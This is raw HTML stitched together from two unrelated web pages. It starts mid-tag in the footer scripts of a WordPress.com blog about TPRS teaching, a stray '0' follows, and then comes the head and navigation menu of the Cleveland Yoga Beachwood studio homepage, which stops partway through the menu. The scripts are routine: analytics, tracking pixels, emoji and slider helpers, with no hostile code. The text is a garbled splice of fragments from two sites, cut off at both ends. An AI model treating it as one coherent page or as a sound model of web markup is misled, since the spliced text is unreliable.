for="carousel-reblog-to-blog-id" id="carousel-reblog-lblogid">Post to</label> <select name="carousel-reblog-to-blog-id" id="carousel-reblog-to-blog-id"> </select> <div class="submit"> <span class="canceltext"><a href="#" class="cancel">Cancel</a></span> <input type="submit" name="carousel-reblog-submit" class="button" id="carousel-reblog-submit" value="Reblog Post" /> <input type="hidden" id="carousel-reblog-blog-id" value="63017184" /> <input type="hidden" id="carousel-reblog-blog-url" value="https://tprsquestionsandanswers.wordpress.com" /> <input type="hidden" id="carousel-reblog-blog-title" value="t.p.r.s. q&amp;a" /> <input type="hidden" id="carousel-reblog-post-url" value="" /> <input type="hidden" id="carousel-reblog-post-title" value="" /> </div> <input type="hidden" id="_wpnonce" name="_wpnonce" value="b8217d2509" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> <div class="arrow"></div> </div> <div class="widget widget_eu_cookie_law_widget"><div class="hide-on-button ads-active" data-hide-timeout="30" data-consent-expiration="180" id="eu-cookie-law" > <form method="post"> <input type="submit" value="Close and accept" class="accept" /> Privacy &amp; Cookies: This site uses cookies. By continuing to use this website, you agree to their use. <br /> To find out more, including how to control cookies, see here: <a href="https://automattic.com/cookies" > Cookie Policy </a> </form> </div> </div><link rel='stylesheet' id='all-css-0-3' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/carousel/jetpack-carousel.css,/wp-content/mu-plugins/tiled-gallery/tiled-gallery.css?m=1524699534j&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var actionbardata = {"siteID":"63017184","siteName":"t.p.r.s. q&a","siteURL":"http:\/\/tprsquestionsandanswers.wordpress.com","icon":"<img alt='' src='https:\/\/s2.wp.com\/i\/logo\/wpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' \/>","canManageOptions":"","canCustomizeSite":"","isFollowing":"","themeSlug":"pub\/suits","signupURL":"https:\/\/wordpress.com\/start\/","loginURL":"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Ftprsquestionsandanswers.wordpress.com%2F2019%2F05%2F09%2Fgianfranco-contis-claim-and-the-evidence%2F&signup_flow=account","themeURL":"","xhrURL":"https:\/\/tprsquestionsandanswers.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"1c05bece34","isSingular":"","isFolded":"","isLoggedIn":"","isMobile":"","subscribeNonce":"<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"0d9eff1482\" \/>","referer":"https:\/\/tprsquestionsandanswers.wordpress.com\/","canFollow":"1","feedID":"17220666","statusMessage":"","customizeLink":"https:\/\/tprsquestionsandanswers.wordpress.com\/wp-admin\/customize.php?url=https%3A%2F%2Ftprsquestionsandanswers.wordpress.com%2F","i18n":{"view":"View site","follow":"Follow","following":"Following","edit":"Edit","login":"Log in","signup":"Sign up","customize":"Customize","report":"Report this content","themeInfo":"Get theme: Suits","shortlink":"Copy shortlink","copied":"Copied","followedText":"New posts from this site will now appear in your <a href=\"https:\/\/wordpress.com\/\">Reader<\/a>","foldBar":"Collapse this bar","unfoldBar":"Expand this bar","editSubs":"Manage subscriptions","viewReader":"View site in Reader","viewReadPost":"View post in Reader","subscribe":"Sign me up","enterEmail":"Enter your email address","followers":"Join 350 other followers","alreadyUser":"Already have a WordPress.com account? <a href=\"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Ftprsquestionsandanswers.wordpress.com%2F2019%2F05%2F09%2Fgianfranco-contis-claim-and-the-evidence%2F&signup_flow=account\">Log in now.<\/a>","stats":"Stats"}}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/tprsquestionsandanswers.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"20067da137","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/tprsquestionsandanswers.wordpress.com\/wp-login.php?redirect_to=https%3A%2F%2Ftprsquestionsandanswers.wordpress.com%2F2019%2F05%2F02%2Fhow-should-i-use-questions-to-assess-reading%2F","blog_id":"63017184","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>","reblog":"Reblog","reblogged":"Reblogged","reblog_add_thoughts":"Add your thoughts here... (optional)","reblogging":"Reblogging...","post_reblog":"Post Reblog","stats_query_args":"blog=63017184&v=wpcom&tz=0&user_id=0&subd=tprsquestionsandanswers","is_public":"1","reblog_enabled":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??-eJyVkN1OwzAMhV+IYIY2sRvEs6SJuznNH7HTwtuTDrVCvYjE3bF9/OnYsGRlUhSMAo7B4kwG89ez4yf4MwpVZV9vFBk8TcjwWbHiXUfrsXTMFEeKJN+7OHrljqHhch2AKwmvIcYajVCK3AEvZG/Y7FjbNE2EyusFBEP2WvDQ73C0DRTVoAsEzYKlKZVmLIVso+y9fxKkaDP14uvHgevSrjpuo0uqjB4cSm5ktTW2HYrG1zVw+x4vYxocGjkCN9rcTkugmfH33Y86F+Q18Ed4P10ub+fT9fry6n4AGrvL/g=='></script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=20111117'></script> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyVy0sOQEAMANALqcZnluIsmGbSUTUZRdyerZVYvsXDM8G0qpEaLjsk2QPrhnayGWUYZZjmkbOHxIRKB2VSzxrKuBX456bvx0IewiBC+XrrWf3SVc61deOquo03DQdDyw=='></script> <script type="text/javascript"> // <![CDATA[ (function() { try{ if ( window.external &&'msIsSiteMode' in window.external) { if (window.external.msIsSiteMode()) { var jl = document.createElement('script'); jl.type='text/javascript'; jl.async=true; jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(jl, s); } } }catch(e){} })(); // ]]> </script><script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery-migrate","jquery","postmessage","mobile-useragent-info","jquery_inview","jetpack_resize","spin","jquery.spin","grofiles-cards","wpgroho","jquery.autoresize","highlander-comments","devicepx","jetpack_likes_queuehandler","the-neverending-homepage","suits-script","eu-cookie-law-script","wpcom-masterbar-js","wpcom-masterbar-tracks-js","wpcom-actionbar-bar","jetpack-carousel","swfobject","videopress","twitter-widgets","twitter-widgets-infinity","twitter-widgets-pending","tiled-gallery"] ); jQuery.extend( infiniteScroll.settings.styles, ["wpcom-smileys","jetpack_likes","the-neverending-homepage","wp-block-library","wpcom-core-compat-playlist-styles","mp6hacks","wpcom-bbpress2-staff-css","suits-style","eu-cookie-law-style","noticons","geo-location-flair","reblogging","a8c-global-print","wpcom-actionbar-bar","h4-global","suits-font","highlander-comments","highlander-comments-ie7","jetpack-carousel","tiled-gallery"] ); </script><script src="//stats.wp.com/w.js?60" type="text/javascript" async defer></script> <script type="text/javascript"> _tkq = window._tkq || []; _stq = window._stq || []; _tkq.push(['storeContext', {'blog_id':'63017184','blog_tz':'0','user_lang':'en','blog_lang':'en','user_id':'0'}]); _stq.push(['view', {'blog':'63017184','v':'wpcom','tz':'0','user_id':'0','subd':'tprsquestionsandanswers'}]); _stq.push(['extra', {'crypt':'UE40eW5QN0p8M2Y/RE1oMUpKVjdLUHY1WldoajE/MT9jXTVxa1MyMC4wRSx6c0k0VD0zQmxBSm1WZjJIPW1LRXdBR0tVOS13ekMvQXNCWTktdEJxVkl1M2x0YkM0ZHJxJjFMS3Jzdj0wcEp+SFQ1eklQVHYsZX5BLGpjQ2cvcW96ZlM3dDFkeGhBNjd6K00zSS42TFpmcV83RWxMWH5QVWxdSm58Zz9jOCY/ZksuN3F8ZUNtVm5ORlZmLEtWYkJmbFguK2MsQktraEg/dmczcVNnfGJtMEVINHJibEQ4ZSVUeFYzd2tbdFVtZm9TZklHLl9dWExlLVhicixlVHlsOE9DVWxfP351RkZsLVUxSEstUz82JVYmJXpULnw/N3Y5W1EwW1NBdDFvdD1VXzVsRk5HN040UFNhWngzM2psbg=='}]); _stq.push([ 'clickTrackerInit', '63017184', '0' ]); </script> <noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:0px;width:0px;overflow:hidden" alt="" /></noscript> <script> if ( 'object' === typeof wpcom_mobile_user_agent_info ) { wpcom_mobile_user_agent_info.init(); var mobileStatsQueryString = ""; if( false !== wpcom_mobile_user_agent_info.matchedPlatformName ) mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName; if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName ) mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName; if( wpcom_mobile_user_agent_info.isIPad() ) mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views'; if( "" != mobileStatsQueryString ) { new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random(); } } </script> </body> </html>
0
<!DOCTYPE html> <!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]--> <!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]--> <!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]--> <!--[if (gte IE 9)|!(IE)]><!--><html lang="en"> <!--<![endif]--> <head> <!-- Basic Page Needs ================================================== --> <meta charset="utf-8"> <title>Cleveland Yoga Beachwood</title> <meta name="author" content="Cleveland Yoga"> <!-- Mobile Specific Metas ================================================== --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="shortcut icon" href="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/favicon.ico"> <!-- CSS ================================================== --> <link rel="stylesheet" href="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/css/bootstrap.min.css"> <xlink rel="stylesheet" href="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/css/fontawesome-all.min.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css"> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous"> <!-- This site is optimized with the Yoast SEO plugin v11.2 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Come discover amazing Vinyasa Power Yoga at Cleveland Yoga in NEO. Affiliate Partners of Baptiste Yoga. Over 100 heated and non-heated classes each week."/> <link rel="canonical" href="https://www.clevelandyoga.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Cleveland Yoga Hot Yoga | Power Yoga | Cleveland Yoga Beachwood" /> <meta property="og:description" content="Come discover amazing Vinyasa Power Yoga at Cleveland Yoga in NEO. Affiliate Partners of Baptiste Yoga. Over 100 heated and non-heated classes each week." /> <meta property="og:url" content="https://www.clevelandyoga.com/" /> <meta property="og:site_name" content="Cleveland Yoga" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Come discover amazing Vinyasa Power Yoga at Cleveland Yoga in NEO. Affiliate Partners of Baptiste Yoga. Over 100 heated and non-heated classes each week." /> <meta name="twitter:title" content="Cleveland Yoga Hot Yoga | Power Yoga | Cleveland Yoga Beachwood" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.clevelandyoga.com/#organization","name":"","url":"https://www.clevelandyoga.com/","sameAs":[]},{"@type":"WebSite","@id":"https://www.clevelandyoga.com/#website","url":"https://www.clevelandyoga.com/","name":"Cleveland Yoga","publisher":{"@id":"https://www.clevelandyoga.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.clevelandyoga.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.clevelandyoga.com/#webpage","url":"https://www.clevelandyoga.com/","inLanguage":"en-US","name":"Cleveland Yoga Hot Yoga | Power Yoga | Cleveland Yoga Beachwood","isPartOf":{"@id":"https://www.clevelandyoga.com/#website"},"about":{"@id":"https://www.clevelandyoga.com/#organization"},"datePublished":"2018-08-07T02:09:04+00:00","dateModified":"2019-03-19T14:44:03+00:00","description":"Come discover amazing Vinyasa Power Yoga at Cleveland Yoga in NEO. Affiliate Partners of Baptiste Yoga. Over 100 heated and non-heated classes each week."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.clevelandyoga.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.clevelandyoga.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://www.clevelandyoga.com/wp-content/plugins/instagram-feed-pro/css/sb-instagram.css?ver=4.1.4' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://www.clevelandyoga.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.3' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <!--[if lt IE 9]> <link rel='stylesheet' id='vc_lte_ie9-css' href='https://www.clevelandyoga.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?ver=6.0.1' type='text/css' media='screen' /> <![endif]--> <link rel='stylesheet' id='js_composer_front-css' href='https://www.clevelandyoga.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.0.1' type='text/css' media='all' /> <style id='js_composer_front-inline-css' type='text/css'> .vc_custom_1526389500197{margin-bottom: 50px !important;}.vc_custom_1526390308888{margin-bottom: 40px !important;}.vc_custom_1533607813035{background-image: url(https://www.clevelandyoga.com/wp-content/uploads/2018/08/home-section-cleveland-yoga-teacher-training.jpg?id=10008) !important;}.vc_custom_1533607840215{background-image: url(https://www.clevelandyoga.com/wp-content/uploads/2018/08/home-section-new-yoga-students.jpg?id=10009) !important;}.vc_custom_1533607869430{background-image: url(https://www.clevelandyoga.com/wp-content/uploads/2018/08/home-section-cleveland-yoga-programs.jpg?id=10011) !important;}.vc_custom_1526389518833{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1533927281454{margin-bottom: 0px !important;padding-bottom: 0px !important;} </style> <link rel='stylesheet' id='bsf-Defaults-css' href='https://www.clevelandyoga.com/wp-content/uploads/smile_fonts/Defaults/Defaults.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='ultimate-style-min-css' href='https://www.clevelandyoga.com/wp-content/plugins/Ultimate_VC_Addons/assets/min-css/ultimate.min.css?ver=3.16.5' type='text/css' media='all' /> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.3'></script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.3'></script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate.min.js?ver=3.16.5'></script> <link rel='https://api.w.org/' href='https://www.clevelandyoga.com/wp-json/' /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://www.clevelandyoga.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.clevelandyoga.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.clevelandyoga.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.clevelandyoga.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.clevelandyoga.com%2F&#038;format=xml" /> <!--/ Facebook Thumb Fixer Open Graph /--> <meta property="og:type" content="article" /> <meta property="og:url" content="https://www.clevelandyoga.com/" /> <meta property="og:title" content="Home 2018" /> <meta property="og:description" content="" /> <meta property="og:site_name" content="Cleveland Yoga" /> <meta property="og:image" content="" /> <meta property="og:image:alt" content="" /> <meta property="og:image:width" content="" /> <meta property="og:image:height" content="" /> <meta itemscope itemtype="article" /> <meta itemprop="description" content="" /> <meta itemprop="image" content="" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:url" content="https://www.clevelandyoga.com/" /> <meta name="twitter:title" content="Home 2018" /> <meta name="twitter:description" content="" /> <meta name="twitter:image" content="" /> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <meta name="generator" content="Powered by Slider Revolution 5.4.8.3 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <link rel="stylesheet" href="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/style.css"> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <link rel="stylesheet" href="css/sky-tabs-ie8.css"> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script src="js/sky-tabs-ie8.js"></script> <![endif]--> <!-- Favicons ================================================== --> <link rel="shortcut icon" href="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/images/favicon.ico"> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-40669436-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-40669436-1'); </script> </head> <body class="home page-template page-template-home-page page-template-home-page-php page page-id-10006 page-home-2018 wpb-js-composer js-comp-ver-6.0.1 vc_responsive"> <!-- Primary Page Layout ================================================== --> <div id="mobile-pre-header"> <div class="container-fluid"> <div class="row mb0"> <div class="col-xs-6 p0"><a class="mobile-pre-header-button btn1" href="http://clients.mindbodyonline.com/ws.asp?studioid=-567&stype=-7&sTG=1&sView=week&sLoc=1">SCHEDULE</a></div> <div class="col-xs-6 p0"><a class="mobile-pre-header-button btn2" href="tel:216.704.4550">216.704.4550</a></div> </div> </div> </div> <header id="header" class="header clearfix"> <div class="container-fluid no-padding" id="pre-header"> <div class="row mb0"> <div class="col-md-12"> <a href="tel:216.704.4550" id="phone"><i class="fa fa-phone-square"></i>216.704.4550</a> <!--<span class="xno-mobile">Location:</span> <span class="location">BEACHWOOD</span> <a href="javascript:void(0)" onclick="openNav()" class="change-location">(change location)</a>--> </div> </div> </div> <div class="container-fluid no-padding"> <div class="row mb0"> <div class="col-md-3 col-xs-3 no-mobile"> <h1 id="header-logo"><a href="https://www.clevelandyoga.com"><img src="/images/logo.png"></a></h1> </div> <div id="mobile-menu-mover" class="col-md-9"> <div id="menu-container"> <div id="menupure" class="menupure menucolor"><ul id="pb-main-menu" class="menupure-menu"><li id="menu-item-10018" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-10006 current_page_item menu-item-10018"><a href="https://www.clevelandyoga.com/" aria-current="page">Home</a></li> <li id="menu-item-9879" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9879"><a href="https://www.clevelandyoga.com/new-yoga-students/">New Students</a> <ul class="sub-menu"> <li id="menu-item-9880" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9880"><a href="https://www.clevelandyoga.com/new-yoga-students/suggested-yoga-classes/">Suggested Beginning Yoga Classes</a></li> <li id="menu-item-9881" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9881"><a href="https://www.clevelandyoga.com/new-yoga-students/beginners-yoga-workshops/">Beginners Workshops</a></li> <li id="menu-item-9882" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9882"><a href="https://www.clevelandyoga.com/new-yoga-students/yoga-tips-and-etiquette/">Yoga Tips and Etiquette</a></li> <li id="menu-item-9883" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9883"><a href="https://www.clevelandyoga.com/new-yoga-students/faqs/">FAQs About Yoga</a></li> </ul> </li> <li id="menu-item-9871" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9871"><a href="https://www.clevelandyoga.com/yoga-classes/">Classes</a> <ul class="sub-menu"> <li id="menu-item-9872" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9872"><a href="https://www.clevelandyoga.com/yoga-classes/pricing/">Pricing</a></li> <li id="menu-item-9873" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9873"><a href="https://www.clevelandyoga.com/yoga-classes/why-the-heat/">Why The Heat?</a></li> <li id="menu-item-9874" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9874"><a href="https://www.clevelandyoga.com/yoga-classes/private-cleveland-yoga-sessions/">Private Sessions</a></li> <li id="menu-item-9875" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9875"><a href="https://www.clevelandyoga.com/yoga-classes/class-schedule/">Class Schedule</a></li> </ul> </li> <li id="menu-item-11213" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-11213"><a href="#">Teacher Training</a> <ul class="sub-menu"> <li id="menu-item-11571" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11571"><a href="https://www.clevelandyoga.com/summer-immersion-teacher-training/">200-Hour Summer Immersion Teacher Training</a></li> <li id="menu-item-9889" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9889"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/">200-Hour Teacher Training</a> <ul class="sub-menu"> <li id="menu-item-9890" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9890"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/teacher-training-faculty/">Yoga Teacher Training Staff</a></li> <li id="menu-item-10098" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10098"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/200-hour-program/">200 Hour Program Details</a></li> <li id="menu-item-9891" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9891"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/yoga-teacher-training-testimonials/">Testimonials</a></li> <li id="menu-item-9892" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9892"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/yoga-teacher-training-faq/">FAQs</a></li> <li id="menu-item-10099" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10099"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/tuition-and-perks/">Tuition &#038; Perks</a></li> </ul> </li> <li id="menu-item-11214" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11214"><a href="https://www.clevelandyoga.com/300-hour-advanced-teacher-training/">300-Hour Advanced Teacher Training</a></li> </ul> </li> <li id="menu-item-9894" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9894"><a href="https://www.clevelandyoga.com/teaching-staff-yoga-teachers/">Teachers</a></li> <li id="menu-item-9884" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9884"><a href="https://www.clevelandyoga.com/yoga-programs/">Programs</a> <ul class="sub-menu"> <li id="menu-item-9886" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9886"><a href="https://www.clevelandyoga.com/yoga-programs/workshops/">Workshops &#038; Events</a></li> <li id="menu-item-9913" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9913"><a href="https://www.clevelandyoga.com/yoga-programs/holistic-health/">Wellness</a></li> <li id="menu-item-9887" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9887"><a href="https://www.clevelandyoga.com/yoga-programs/runcleyoga-cy-run-club/">#runCLEyoga: CY Run Club</a></li> </ul> </li> <li id="menu-item-9865" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-9865"><a href="https://www.clevelandyoga.com/about-cleveland-yoga/">About</a> <ul class="sub-menu"> <li id="menu-item-11383" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11383"><a href="https://www.clevelandyoga.com/give/">Give</a></li> <li id="menu-item-9868" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9868"><a href="https://www.clevelandyoga.com/about-cleveland-yoga/breathe-boutique/">Breathe Boutique</a></li> <li id="menu-item-9866" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9866"><a href="https://www.clevelandyoga.com/about-cleveland-yoga/desk-staff-application/">Desk Staff Application</a></li> </ul> </li> <li id="menu-item-9876" class="menu-item menu-item-type-post_type 